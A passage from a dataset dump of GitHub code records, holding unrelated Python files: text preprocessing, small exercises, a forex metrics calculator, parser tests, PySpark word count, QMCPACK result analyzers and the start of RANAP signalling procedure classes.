WordNetLemmatizer()\n    lemma_words = [lemmatizer.lemmatize(o) for o in words]\n    return lemma_words\n\ndef words_from_text(text: str) -> list[str]:\n    return text.split(\" \")\n\ndef text_from_words(words: list[str]) -> str:\n    return \" \".join(words)\n\ndef tokenize(text: str) -> list[str]:\n    return word_tokenize(text)\n\ndef is_letter_only(word: str) -> bool:\n    for char in word:\n        if not char.isalpha():\n            return False\n    return True\n\ndef clean_text(text: str) -> str:\n    \"\"\"\n    input: text\n    Eg text = \n    '''\n    we could have had it all\n    rolling in the deep\n    you had my heart inside you hand\n    but you played it to the beat\n    '''\n\n    output: Cleaned text (no names and only alphanumeric)\n    \"\"\"\n    text_cleaned = []\n    words = tokenize(text)\n\n    for word in words:\n        word = word.lower()\n        if is_letter_only(word) and word not in ALL_NAMES:\n            text_cleaned.append(word)\n\n    text_cleaned = text_from_words(text_cleaned)\n    return text_cleaned\n\ndef text_to_feature_array(text: str) -> np.array:\n    feature_space = read_feature_names()\n    result = []\n    cleaned_text = clean_text(text)\n    tokens = tokenize(cleaned_text)\n    for token in tokens:\n        if token in feature_space:\n            result.append(feature_space.index(token))\n\n    return np.array(result)\n\n","repo_name":"jatin837/spambuster","sub_path":"lib/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}{"seq_id":"5447449456","text":"def get_day_of_week(number):\n    days_of_week = {1: \"Monday\", 2: \"Tuesday\", 3: \"Wednesday\", 4: \"Thursday\", 5: \"Friday\", 6: \"Saturday\", 7: \"Sunday\"}\n\n    if 1 <= number <= 7:\n        return days_of_week[number]\n    else:\n        return \"Invalid day number. Please enter a number between 1 and 7.\"\n\ndef main():\n    try:\n        number = int(input(\"Enter a number (1-7) to get the corresponding day of the week: \"))\n        result = get_day_of_week(number)\n        print(result)\n    except ValueError:\n        print(\"Error: Please enter a valid numerical value.\")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"GlotovES/HW11/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}{"seq_id":"39109899634","text":"from __future__ import absolute_import\n\nimport logging\nimport pandas as pd\nimport asyncio\n\nfrom adit.controllers import TileDBController, EventLoopController, TPOOL\n\n__all__ = ['MetricsCalculator']\n\n\nclass MetricsCalculator:\n    _CCY_PAIRS = ['EURUSD', 'USDJPY', 'EURJPY']\n    TASK_NAME = \"data-metric-cal\"\n    _INSTANCE = None\n\n    def __init__(self):\n        self.logger = logging.getLogger(self.__class__.__name__)\n        self.tiledb = TileDBController.instance()\n        self.evl = EventLoopController.instance()\n        self.evl_loop = self.evl.get_loop()\n        self.frequency = 86400 # 1 day\n\n    def _cal_metrics(self, pair, from_ts, to_ts):\n        self.logger.debug(f\"getting data of pair {pair} to calculate midclose rate\")\n        df = self.tiledb.get_ts_dataframe('raw', pair, from_ts, to_ts)\n\n        self.logger.debug(f\"resample data of pair {pair} to daily and drop NaN data row\")\n        df = df.set_index('date').resample('D').last().dropna(axis=0, how='all')\n\n        if len(df.index) < 2:\n            self.logger.debug(f\"data is not enough to perform metrics calculation, at least 2 days worth of data is required\")\n            return\n\n        self.logger.debug(f\"calculate midclose rate data of pair {pair} and drop unnecessary 
data\")\n df['midclose'] = (df['bidclose'].abs() + df['askclose'].abs()) / 2\n df = df.drop(columns=['bidopen', 'bidclose', 'bidhigh', 'bidlow', 'askopen', 'askclose', 'askhigh', 'asklow', 'tickqty'])\n\n self.logger.debug(f\"calculate log return of midclose of pair {pair}\")\n logret_df = df.pct_change().rename(columns={\"midclose\": \"logret\"})\n\n self.logger.debug(f\"calculate exponential moving average of log return of pair {pair}\")\n ema_df = logret_df.ewm(alpha=0.5, adjust=True, ignore_na=True, min_periods=5).mean().rename(columns={\"logret\": \"logret_ema\"})\n\n df = pd.merge(df, logret_df, how='inner', left_index=True, right_index=True)\n df = pd.merge(df, ema_df, how='inner', left_index=True, right_index=True)\n self.logger.debug(f\"store daily metrics of {pair} to tiledb\")\n self.tiledb.store_df(\"health\", f\"{pair}_DAILY_METRICS\", df)\n\n def cal_metrics(self, pair, from_ts, to_ts):\n self.logger.debug(f\"awaiting for metric fcalculation rom {from_ts} to {to_ts} for pair {pair}\")\n self._cal_metrics(pair, from_ts, to_ts)\n\n def cal(self, from_ts=None, to_ts=None):\n for pair in self._CCY_PAIRS:\n self.logger.debug(f\"calculate metric from {from_ts} to {to_ts} for pair {pair}\")\n data_domain = self.tiledb.get_data_domain('raw', pair)\n if not from_ts:\n from_ts = data_domain[0]\n\n if not to_ts:\n to_ts = data_domain[1]\n\n self.cal_metrics(pair, from_ts, to_ts)\n\n async def cal_async(self):\n for pair in self._CCY_PAIRS:\n from_ts = self.tiledb.get_data_domain(\"health\", f\"{pair}_DAILY_METRICS\")[1]\n to_ts = self.tiledb.get_data_domain(\"raw\", pair)[1]\n if to_ts > from_ts:\n self.logger.debug(f\"calculate data metrics from {from_ts} to {to_ts}\")\n await self.evl_loop.run_in_executor(TPOOL, self.cal_metrics, pair, from_ts, to_ts)\n else:\n self.logger.debug(f\"data metrics is already up to date\")\n\n def start(self):\n self.evl.shedule_task(self.TASK_NAME, self._run)\n\n def stop(self) -> None:\n self.evl.stop_task(self.TASK_NAME)\n\n async def _run(self, queue):\n self.logger.info(\"starting fxcm data crawler\")\n while True:\n try:\n await self.cal_async()\n await asyncio.sleep(self.frequency)\n except Exception as ex:\n self.logger.error(\"fxcm crawler has exception\", exc_info=ex)\n try:\n self.stop()\n except:\n pass\n break\n\n @classmethod\n def instante(cls):\n if cls._INSTANCE is None:\n cls._INSTANCE = MetricsCalculator()\n return cls._INSTANCE\n\n\n\n","repo_name":"trinhtrannp/adit","sub_path":"adit/processor/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44355270431","text":"import os\nimport pytest\nimport random\nimport string\nfrom collections import Counter\n\nfrom word_parser.parser import Parser\n\nFILE_PATH = os.path.dirname(__file__)\n\n\n@pytest.fixture(scope=\"function\")\ndef test_input():\n with open(f\"{FILE_PATH}/test_input.txt\") as input_file:\n words = input_file.read().splitlines()[0].split(\" \")\n yield words\n\n\ndef test_get_stop_words():\n test_parser = Parser(\n input_file=\"fake.txt\", rules_file=f\"{FILE_PATH}/test_stopwords.txt\"\n )\n assert test_parser.stop_words == {\"a\", \"about\", \"above\", \"after\", \"again\"}\n\n\ndef test_stop_words_removed(test_input):\n test_parser = Parser(\n input_file=\"fake.txt\", rules_file=f\"{FILE_PATH}/test_stopwords.txt\"\n )\n\n final_list = []\n for word in test_input:\n if not test_parser.exclude_stop_words(word):\n final_list.append(word)\n 
assert final_list == [\n \"There's\",\n \"story\",\n \"simple\",\n \"man\",\n \"trying\",\n \"to\",\n \"make\",\n \"his\",\n \"way\",\n \"in\",\n \"the\",\n \"universe\",\n ]\n\n\ndef test_non_alpha_removed(test_input):\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n final_list = []\n for word in test_input:\n final_list.append(test_parser.remove_non_alpha(word))\n assert final_list == [\n \"Theres\",\n \"a\",\n \"story\",\n \"about\",\n \"a\",\n \"simple\",\n \"man\",\n \"trying\",\n \"to\",\n \"make\",\n \"his\",\n \"way\",\n \"in\",\n \"the\",\n \"universe\",\n ]\n\n\ndef test_parse_line():\n test_parser = Parser(\n input_file=\"fake.txt\", rules_file=f\"{FILE_PATH}/test_stopwords.txt\"\n )\n with open(f\"{FILE_PATH}/test_input.txt\") as input_file:\n line = input_file.read().splitlines()[0]\n test_parser.parse_line(line)\n assert test_parser.final_words == Counter(\n {\n \"there\": 1,\n \"stori\": 1,\n \"simpl\": 1,\n \"man\": 1,\n \"try\": 1,\n \"to\": 1,\n \"make\": 1,\n \"hi\": 1,\n \"wai\": 1,\n \"in\": 1,\n \"the\": 1,\n \"univers\": 1,\n }\n )\n\n\ndef test_parse_file():\n test_parser = Parser(\n input_file=f\"{FILE_PATH}/test_input.txt\",\n rules_file=f\"{FILE_PATH}/test_stopwords.txt\",\n )\n test_parser.parse_file()\n assert test_parser.final_words == Counter(\n {\n \"there\": 1,\n \"stori\": 1,\n \"simpl\": 1,\n \"man\": 1,\n \"try\": 1,\n \"to\": 1,\n \"make\": 1,\n \"hi\": 1,\n \"wai\": 1,\n \"in\": 1,\n \"the\": 1,\n \"univers\": 1,\n }\n )\n\n\ndef test_insert_top_word():\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n top_words = [(\"a\", 4), (\"b\", 3)]\n test_parser.insert_top_word(0, top_words, 5, \"c\", 5)\n assert top_words == [(\"c\", 5), (\"a\", 4), (\"b\", 3)]\n\n\ndef test_insert_top_word_beyond_max():\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n top_words = [(\"a\", 4), (\"b\", 3)]\n test_parser.insert_top_word(3, top_words, 2, \"c\", 2)\n assert top_words == [(\"a\", 4), (\"b\", 3)]\n\n\ndef test_get_root_word():\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n root_words = []\n with open(f\"{FILE_PATH}/test_stem.txt\") as f:\n for word in f.read().splitlines():\n root_words.append(test_parser.get_root_word(word))\n assert root_words == [\"jump\", \"jump\", \"jump\"]\n\n\ndef test_top_words():\n # Seed random to ensure same results\n random.seed(1)\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n for letter in string.ascii_lowercase:\n test_parser.final_words[letter] = random.randint(1, 20)\n top_words = test_parser.get_top_words(20)\n print(test_parser.final_words.most_common(20))\n print(top_words)\n assert top_words == [\n (\"p\", 20),\n (\"b\", 19),\n (\"u\", 19),\n (\"f\", 16),\n (\"h\", 16),\n (\"l\", 16),\n (\"g\", 15),\n (\"r\", 15),\n (\"o\", 14),\n (\"i\", 13),\n (\"n\", 13),\n (\"w\", 11),\n (\"d\", 9),\n (\"s\", 9),\n (\"t\", 8),\n (\"j\", 7),\n (\"a\", 5),\n (\"e\", 4),\n (\"k\", 4),\n (\"v\", 4),\n ]\n","repo_name":"nrgeil/programming_assignment","sub_path":"test/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9158110691","text":"import sys\n\ndef dijkstra(K,V,graph):\n INF=sys.maxsize\n s=[False]*V\n d=[INF]*V\n d[K-1]=0\n while True:\n m=INF\n N=-1\n\n for j in range(V):\n if not s[j] and m>d[j]:\n m=d[j]\n N=j\n\n if m==INF:\n break\n\n s[N]=True\n\n for j in 
range(V):\n            if s[j]: continue\n            via=d[N]+graph[N][j]\n            if d[j] > via:\n                d[j] = via\n    return d \n\n\n\n\nINF=sys.maxsize\n\nV,X,Y=map(int,(input().split()))\ngraph=[[INF]*(V) for _ in range(V)]\n\nfor _ in range(V-1):\n    u,v,w=map(int,input().split())\n    graph[u-1][v-1]=w\n    graph[v-1][u-1]=w\n\n# debug print of the full V x V adjacency matrix\nfor i in range(V):\n    for j in range(V):\n        print(graph[i][j] if graph[i][j]!=INF else \"INF\",end=' ')\n    print()\n\n#for d in dijkstra(1,V,graph):\n#    print(d if d!= INF else \"INF\", end= ' ')\n\nd=dijkstra(1,V,graph)\nprint(d)\n\n\n\n\n\n","repo_name":"gitcheol/MyGit","sub_path":"Algorithms/python/15971.py","file_name":"15971.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"27665595825","text":"## word count program in python\n\nfrom pyspark import SparkConf,SparkContext\n\nconf = SparkConf().setAppName(\"Word Count\")\n\nsc = SparkContext(conf=conf)\n\ndataRDD = sc.textFile(\"hdfs://quickstart.cloudera:8020/user/cloudera/spark/testdata.txt\")\n\n## split each row and flatten the arrays as rows\ndataFlatMap = dataRDD.flatMap(lambda x: x.split(\" \"))\n\n## Assign a value 1 for each word\ndataMap = dataFlatMap.map(lambda x: (x, 1))\n\n## reduce the map by summing up all the 1s against each word which is a key hence reduceByKey\nwordCount = dataMap.reduceByKey(lambda x, y: x+y)\n\nfor rec in wordCount.collect():\n\tprint(rec)\n\n\n\n\n","repo_name":"krishnapriyaps/CCA_175_Study","sub_path":"pyspark/wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"31791036401","text":"\"\"\"\nauthor : Lee Sang Min\ngithub : https://github.com/sangm1n\ne-mail : dltkd96als@naver.com\n\ntitle : 수들의 합 5 (Sum of Numbers 5)\ndescription : Two Pointer\n\"\"\"\n\nN = int(input())\n\ni, j = 1, 2\ntotal = 3\nresult = 0\nwhile i <= N-1 and j <= N:\n    if total < N:\n        j += 1\n        total += j\n    else:\n        if total == N:\n            result += 1\n        i += 1\n        total -= i-1\n\nprint(result + 1)\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"71125539572","text":"from numpy import array,empty,zeros,sqrt,arange\nfrom generic import obj\nfrom unit_converter import convert\nfrom qmcpack_input import QmcpackInput\nfrom qmcpack_analyzer_base import QAobject,QAanalyzer\nfrom debug import *\n\n\n\nclass ResultAnalyzer(QAanalyzer):\n    None\n#end class ResultAnalyzer\n\n\nclass OptimizationAnalyzer(ResultAnalyzer):\n    def __init__(self,input,opts,energy_weight=None,variance_weight=None,nindent=0):\n        QAanalyzer.__init__(self,nindent=nindent)\n\n        self.opts = opts\n        self.energy_weight = energy_weight\n        self.variance_weight = variance_weight\n\n\n        ew,vw = energy_weight,variance_weight\n        if ew is None or vw is None:\n            opts_in = [] \n            for qmc in input.simulation.calculations:\n                if qmc.method in self.opt_methods:\n                    opts_in.append(qmc)\n                #end if\n            #end for\n            optin = opts_in[-1] #take cost info from the last optimization section\n            curv,crv,ce = optin.get(['unreweightedvariance','reweightedvariance','energy'])\n            if curv is None and crv is None and ce is None:\n                if optin.minmethod.lower().startswith('oneshift'):\n                    ce = 1.0 # energy-only for oneshift\n                    crv = 0.0\n                else:\n                    ce = 0.9 # qmcpack defaults\n                    crv = 0.1\n                #end if\n            #end if\n            if vw is None:\n                vw = 0\n                if crv is 
not None:\n vw += crv\n #end if\n if curv is not None:\n vw += curv\n #end if\n #end if\n if ew is None:\n ew = 0\n if ce is not None:\n ew = ce\n #end if\n #end if\n #end if\n\n if self.optimize=='lastcost':\n self.optimize = ew,vw\n #end if\n\n #end def __init__\n\n\n def init_sub_analyzers(self):\n None\n #end def init_sub_analyzers\n\n def analyze_local(self):\n input = QAanalyzer.run_info.input\n self.info.system = QAanalyzer.run_info.system\n opts = obj(self.opts)\n ew = self.energy_weight\n vw = self.variance_weight\n\n Efail = 1e6\n Vfail = 1e3\n EVratio_fail = 0.30\n EVratio_soft_fail = 0.15\n \n #save the energies and variances of opt iterations\n res = obj()\n variance_present = False\n any_complete = False\n all_complete = True\n unstable = False\n any_stable = False\n for s,opt in opts.items():\n if s==0:\n continue\n #end if\n complete = opt.info.complete\n any_complete |= complete\n all_complete &= complete\n if complete:\n fail = False\n le = opt.scalars.LocalEnergy\n en = le.mean\n enerr = le.error\n fail |= abs(en)>Efail\n if 'LocalEnergyVariance' in opt.scalars:\n variance_present = True\n lev = opt.scalars.LocalEnergyVariance\n va = lev.mean\n vaerr = lev.error\n fail |= abs(va)>Vfail or abs(va/en)>EVratio_fail\n #end if\n if not fail:\n any_stable = True\n sres = obj()\n sres.en = en\n sres.enerr = enerr\n if variance_present:\n sres.va = va\n sres.vaerr = vaerr\n #end if\n res[s] = sres\n #end if\n unstable|=fail\n #end if\n #end for\n unstable |= not any_complete\n\n nseries = len(res)\n en = zeros((nseries,),dtype=float)\n enerr = zeros((nseries,),dtype=float)\n va = zeros((nseries,),dtype=float)\n vaerr = zeros((nseries,),dtype=float)\n\n series = array(sorted(res.keys()),dtype=int)\n i = 0\n for s in series:\n sres = res[s]\n en[i] = sres.en\n enerr[i] = sres.enerr\n if variance_present:\n va[i] = sres.va\n vaerr[i] = sres.vaerr\n #end if\n i+=1\n #end for\n \n\n self.set(\n any_complete = any_complete,\n all_complete = all_complete,\n unstable = unstable,\n series = series,\n energy = en,\n energy_error = enerr,\n variance = va,\n variance_error = vaerr,\n )\n\n\n #find the optimal coefficients\n optimize = self.optimize\n if variance_present and optimize=='variance':\n ew = 0.0\n vw = 1.0\n elif optimize=='energy':\n ew = 1.0\n vw = 0.0\n elif optimize=='energy_within_variance_tol' or optimize=='ewvt':\n None\n elif optimize=='last':\n None\n elif isinstance(optimize,(tuple,list)) and len(optimize)==2:\n ew,vw = optimize\n else:\n self.error('selection for optimization is invalid\\noptimize setting: {0}\\nvalid options are: energy, variance, energy_within_variance_tol, or a length 2 tuple containing the cost of energy and variance, e.g. 
(.5,.5)'.format(optimize))\n        #end if\n\n        self.failed = True\n        self.optimal_series = None\n        self.optimal_file = None\n        self.optimal_wavefunction = None\n        if any_stable:\n            if optimize=='energy_within_variance_tol' or optimize=='ewvt':\n                indices = arange(len(series),dtype=int)\n                vartol = 0.2\n                vmin = va.min()\n                vind = indices[abs(va-vmin)/vmin<vartol]\n                index = vind[en[vind].argmin()]\n            elif optimize=='last':\n                index = len(en)-1\n            else:\n                index = (ew*en+vw*va).argmin()\n            #end if\n            opt_series = series[index]\n            failed = abs(en[index])>Efail or abs(va[index])>Vfail or abs(va[index]/en[index])>EVratio_soft_fail \n\n            self.failed = failed\n            # In QMCPACK series the optimal parameters are off by 1 index\n            opt_series -= 1\n            self.optimal_series = opt_series\n            self.optimal_file = opts[opt_series].info.files.opt\n            self.optimal_wavefunction = opts[opt_series].wavefunction.info.wfn_xml.copy()\n        #end if\n    #end def analyze_local\n\n\n    def summarize(self,units='eV',norm=1.,energy=True,variance=True,header=True):\n        if isinstance(norm,str):\n            norm = norm.replace('_',' ').replace('-',' ')\n            if norm=='per atom':\n                norm = len(self.info.system.structure.elem)\n            else:\n                self.error('norm must be a number or \"per atom\"\\n you provided '+norm)\n            #end if\n        #end if\n        econv = convert(1.0,'Ha',units)/norm\n        en = econv*self.energy\n        enerr = econv*self.energy_error\n        va = econv**2*self.variance\n        vaerr = econv**2*self.variance_error\n        emax = en.max()\n        vmax = va.max()\n        if header:\n            print('Optimization summary:')\n            print('====================')\n        #end if\n        if energy:\n            if header:\n                print(' Energies ({0}):'.format(units))\n            #end if\n            for i in range(len(en)):\n                print(' {0:>2} {1:9.6f} +/-{2:9.6f}'.format(i,en[i]-emax,enerr[i]))\n            #end for\n            print(' ref {0:9.6f}'.format(emax))\n        #end if\n        if variance:\n            if header:\n                print(' Variances ({0}^2):'.format(units))\n            #end if\n            for i in range(len(en)):\n                print(' {0:>2} {1:9.6f} +/- {2:9.6f}'.format(i,va[i],vaerr[i]))\n            #end for\n        #end if\n    #end def summarize\n\n\n    def plot_opt_convergence(self,title=None,saveonly=False):\n        if title is None:\n            ts = 'Optimization: Energy/Variance Convergence'\n        else:\n            ts = title\n        #end if\n        from matplotlib.pyplot import figure,subplot,xlabel,ylabel,plot,errorbar,title,xticks,xlim\n\n        opt = self.opts\n        nopt = len(opt)\n        if nopt==0:\n            return\n        #end if\n\n        en = self.energy\n        enerr = self.energy_error\n        va = self.variance\n        vaerr = self.variance_error\n\n        #plot energy and variance\n        figure()\n        r = list(range(nopt))\n        subplot(3,1,1)\n        errorbar(r,en,enerr,fmt='b')\n        ylabel('Energy (Ha)')\n        title(ts)\n        xticks([])\n        xlim([r[0]-.5,r[-1]+.5])\n        subplot(3,1,2)\n        errorbar(r,va,vaerr,fmt='r')\n        ylabel('Var. 
($Ha^2$)')\n xticks([])\n xlim([r[0]-.5,r[-1]+.5])\n subplot(3,1,3)\n plot(r,abs(sqrt(va)/en),'k')\n ylabel('Var.^(1/2)/|En.|')\n xlabel('Optimization attempts')\n xticks(r)\n xlim([r[0]-.5,r[-1]+.5])\n #end def plot_opt_convergence\n \n\n def plot_jastrow_convergence(self,title=None,saveonly=False,optconv=True):\n if title is None:\n tsin = None\n else:\n tsin = title\n #end if\n from matplotlib.pyplot import figure,subplot,xlabel,ylabel,plot,errorbar,title,xticks,xlim\n\n opt = self.opts\n nopt = len(opt)\n if nopt==0:\n return\n #end if\n\n if optconv:\n self.plot_opt_convergence(saveonly=saveonly)\n #end if\n\n #plot Jastrow functions\n w = opt[0].wavefunction\n jtypes = w.jastrow_types\n order = QAobject()\n for jt in jtypes:\n if jt in w:\n order[jt] = list(w[jt].__dict__.keys())\n order[jt].sort()\n #end if\n #end for\n cs = array([1.,0,0])\n ce = array([0,0,1.])\n for jt in jtypes:\n if jt in w:\n figure()\n nsubplots = len(order[jt])\n n=0\n for o in order[jt]:\n n+=1\n subplot(nsubplots,1,n)\n if n==1:\n if tsin is None:\n ts = 'Optimization: '+jt+' Convergence'\n else:\n ts = tsin\n #end if\n title(ts)\n #end if\n for i in range(len(opt)):\n f = float(i)/len(opt)\n c = f*ce + (1-f)*cs\n J = opt[i].wavefunction[jt][o]\n J.plot(color=c)\n #end for\n ylabel(o)\n #end for\n xlabel('r (Bohr)')\n #end if\n #end for\n #end def plot_jastrow_convergence\n\n\n#end class OptimizationAnalyzer\n\n\n\n\n\n\nclass TimestepStudyAnalyzer(ResultAnalyzer):\n def __init__(self,dmc,nindent=0):\n QAanalyzer.__init__(self,nindent=nindent)\n self.set(\n dmc = dmc,\n timesteps = [],\n energies = [],\n errors = []\n )\n #end def __init__\n\n def init_sub_analyzers(self):\n None\n #end def init_sub_analyzers\n\n def analyze_local(self):\n timesteps = []\n energies = []\n errors = []\n for dmc in self.dmc:\n timesteps.append(dmc.info.method_input.timestep)\n energies.append(dmc.scalars.LocalEnergy.mean)\n errors.append(dmc.scalars.LocalEnergy.error)\n #end for\n timesteps = array(timesteps)\n energies = array(energies)\n errors = array(errors)\n order = timesteps.argsort()\n self.timesteps = timesteps[order]\n self.energies = energies[order]\n self.errors = errors[order]\n #end def analyze_local\n\n def summarize(self,units='eV',header=True):\n timesteps = self.timesteps\n energies = convert(self.energies.copy(),'Ha',units)\n errors = convert(self.errors.copy(),'Ha',units)\n Esmall = energies[0]\n if header:\n print('Timestep study summary:')\n print('======================')\n #end if\n for i in range(len(timesteps)):\n ts,E,Eerr = timesteps[i],energies[i],errors[i]\n print(' {0:>6.4f} {1:>6.4f} +/- {2:>6.4f}'.format(ts,E-Esmall,Eerr))\n #end for\n #end def summarize\n\n def plot_timestep_convergence(self):\n from matplotlib.pyplot import figure,subplot,xlabel,ylabel,plot,errorbar,title,text,xticks,rcParams,savefig,xlim\n\n params = {'legend.fontsize':14,'figure.facecolor':'white','figure.subplot.hspace':0.,\n 'axes.labelsize':16,'xtick.labelsize':14,'ytick.labelsize':14}\n rcParams.update(params) \n\n\n timesteps = self.timesteps\n energies = convert(self.energies.copy(),'Ha','eV')\n errors = convert(self.errors.copy(),'Ha','eV')\n Esmall = energies[0]\n\n figure()\n tsrange = [0,1.1*timesteps[-1]]\n plot(tsrange,[0,0],'k-')\n errorbar(timesteps,energies-Esmall,errors,fmt='k.')\n text(array(tsrange).mean(),0,'{0:6.4f} eV'.format(Esmall))\n xticks(timesteps)\n xlim(tsrange)\n xlabel('Timestep (Ha)')\n ylabel('Total Energy (eV)')\n title('DMC Timestep Convergence')\n\n 
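# the PNG is written straight to disk; no interactive show() is issued\n        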
savefig('TimestepConvergence.png',format='png',bbox_inches ='tight',pad_inches=1)\n #end def plot_timestep_convergence\n#end class TimestepStudyAnalyzer\n","repo_name":"QMCPACK/qmcpack","sub_path":"nexus/lib/qmcpack_result_analyzers.py","file_name":"qmcpack_result_analyzers.py","file_ext":"py","file_size_in_byte":13869,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"} +{"seq_id":"71077811572","text":"__all__ = [\n 'RANAPSigProc',\n 'RANAPConlessSigProc',\n #\n 'RANAPRelocationPreparation',\n 'RANAPRelocationCancel',\n 'RANAPRABReleaseRequest',\n 'RANAPIuReleaseRequest',\n 'RANAPRelocationDetect',\n 'RANAPRelocationComplete',\n 'RANAPLocationReport',\n 'RANAPInitialUEMessage',\n 'RANAPDirectTransferRNC',\n 'RANAPErrorIndRNC',\n 'RANAPSRNSContextForwardToCN',\n 'RANAPPrivateMessageRNC',\n 'RANAPRABModificationRequest',\n 'RANAPMBMSRegistration',\n 'RANAPMBMSRABEstablishmentInd',\n 'RANAPMBMSRABRelease',\n 'RANAPEnhancedRelocationComplete',\n 'RANAPEnhancedRelocationCompleteConfirm',\n 'RANAPSRVCCPreparation',\n 'RANAPUERegistrationQuery',\n 'RANAPRABAssignment',\n 'RANAPIuRelease',\n 'RANAPRelocationResourceAllocation',\n 'RANAPSRNSContextTransfer',\n 'RANAPSecurityModeControl',\n 'RANAPDataVolumeReport',\n 'RANAPCommonID',\n 'RANAPCNInvokeTrace',\n 'RANAPLocationReportingControl',\n 'RANAPDirectTransferCN',\n 'RANAPErrorIndCN',\n 'RANAPSRNSDataForwarding',\n 'RANAPSRNSContextForwardToRNC',\n 'RANAPPrivateMessageCN',\n 'RANAPCNDeactivateTrace',\n 'RANAPLocationRelatedData',\n 'RANAPUESpecificInformation',\n 'RANAPMBSMSessionStart',\n 'RANAPMBMSSessionUpdate',\n 'RANAPMBMSSessionStop',\n 'RANAPMBMSUELinking',\n 'RANAPMBMSCNDeregistration',\n 'RANAPUERadioCapabilityMatch',\n 'RANAPRerouteNASRequest',\n #\n 'RANAPResetRNC',\n 'RANAPResetCN',\n 'RANAPPaging',\n 'RANAPOverloadControlRNC',\n 'RANAPOverloadControlCN',\n 'RANAPErrorIndConlessRNC',\n 'RANAPErrorIndConlessCN',\n 'RANAPResetResourceRNC',\n 'RANAPResetResourceCN',\n 'RANAPUplinkInformationTransfer',\n 'RANAPInformationTransfer',\n 'RANAPDirectInformationTransferRNC',\n 'RANAPDirectInformationTransferCN',\n #\n 'RANAPProcRncDispatcher',\n 'RANAPProcCnDispatcher',\n 'RANAPConlessProcRncDispatcher',\n 'RANAPConlessProcCnDispacther'\n ]\n\nfrom .utils import *\nfrom .ProcProto import *\n\n#------------------------------------------------------------------------------#\n# RANAP signalling procedure\n# TS 25.413, version d20\n# Core Network side\n#------------------------------------------------------------------------------#\n\nclass RANAPSigProc(LinkSigProc):\n \"\"\"RANAP connection-oriented signalling procedure handler\n \n instance attributes:\n - Name : procedure name\n - Iu : reference to the Iu[C|P]Sd instance running this procedure\n - RNC : reference to the HNBd instance connected by Iu\n - Server: reference to the CorenetServer instance handling the RNC\n - UE : reference to the UEd instance connected by Iu\n - Desc : ASN.1 procedure description\n - Code : procedure code\n - Crit : procedure criticality\n - Cont : ASN.1 procedure PDU(s) content\n - Encod : custom PDU encoders with fixed values\n - Decod : custom PDU decoders with transform functions\n \"\"\"\n \n TRACK_PDU = True\n \n # for UE-related signalling\n UE = None\n \n def __init__(self, iud):\n #\n self.Name = self.__class__.__name__\n self.Iu = iud\n self.RNC = iud.RNC\n self.Server = iud.RNC.Server\n if iud.UE:\n self.UE = iud.UE\n else:\n self._log('WNG', 'no UEd instance attached')\n #\n # to store PDU traces\n 
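# each trace entry is a (timestamp, 'UL'/'DL', pdu) triple appended by _recv() and _send()\n        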
self._pdu = []\n # list of PDU to be sent to the HNB\n self._pdu_tx = []\n # enable NAS procedure to set callback to .postprocess() before self terminates\n self._cb = None\n #\n self._log('DBG', 'instantiating procedure')\n \n def _log(self, logtype, msg):\n self.Iu._log(logtype, '[%s] %s' % (self.Name, msg))\n \n def _recv(self, pdu_rx):\n if self.TRACK_PDU:\n self._pdu.append( (time(), 'UL', pdu_rx) )\n self.errcause, self.UEInfo = None, {}\n try:\n self.decode_pdu(pdu_rx, self.UEInfo)\n except Exception as err:\n self._err = err\n self._log('ERR', 'decode_pdu (%s), sending error indication' % err)\n # error cause: protocol, abstract-syntax-error-reject\n self.errcause = ('protocol', 100)\n \n def recv(self, pdu_rx):\n self._recv(pdu_rx)\n self._log('ERR', 'recv() not implemented')\n \n def _send(self):\n if self.TRACK_PDU:\n for pdu in self._pdu_tx:\n self._pdu.append( (time(), 'DL', pdu) )\n return self._pdu_tx\n \n def send(self):\n self._log('ERR', 'send() not implemented')\n return self._send()\n \n def trigger(self):\n return []\n \n def abort(self):\n if self.Code in self.Iu.Proc:\n del self.Iu.Proc[self.Code]\n self._log('INF', 'aborting')\n\n\nclass RANAPConlessSigProc(LinkSigProc):\n \"\"\"RANAP connection-less signalling procedure handler\n \n instance attributes:\n - Name : procedure name\n - RNC : reference to the HNBd instance connected by Iu\n - Server: reference to the CorenetServer instance handling the RNC\n - Desc : ASN.1 procedure description\n - Code : procedure code\n - Crit : procedure criticality\n - Cont : ASN.1 procedure PDU(s) content\n - Encod : custom PDU encoders with fixed values\n - Decod : custom PDU decoders with transform functions\n \"\"\"\n \n TRACK_PDU = True\n \n def __init__(self, rncd):\n #\n self.Name = self.__class__.__name__\n self.RNC = rncd\n self.Server = rncd.Server\n #\n # to store PDU traces\n self._pdu = []\n # list of PDU to be sent to the HNB\n self._pdu_tx = []\n #\n self._log('DBG', 'instantiating procedure')\n \n def _log(self, logtype, msg):\n self.RNC._log(logtype, '[%s] %s' % (self.Name, msg))\n \n def _recv(self, pdu_rx):\n if self.TRACK_PDU:\n self._pdu.append( (time(), 'UL', pdu_rx) 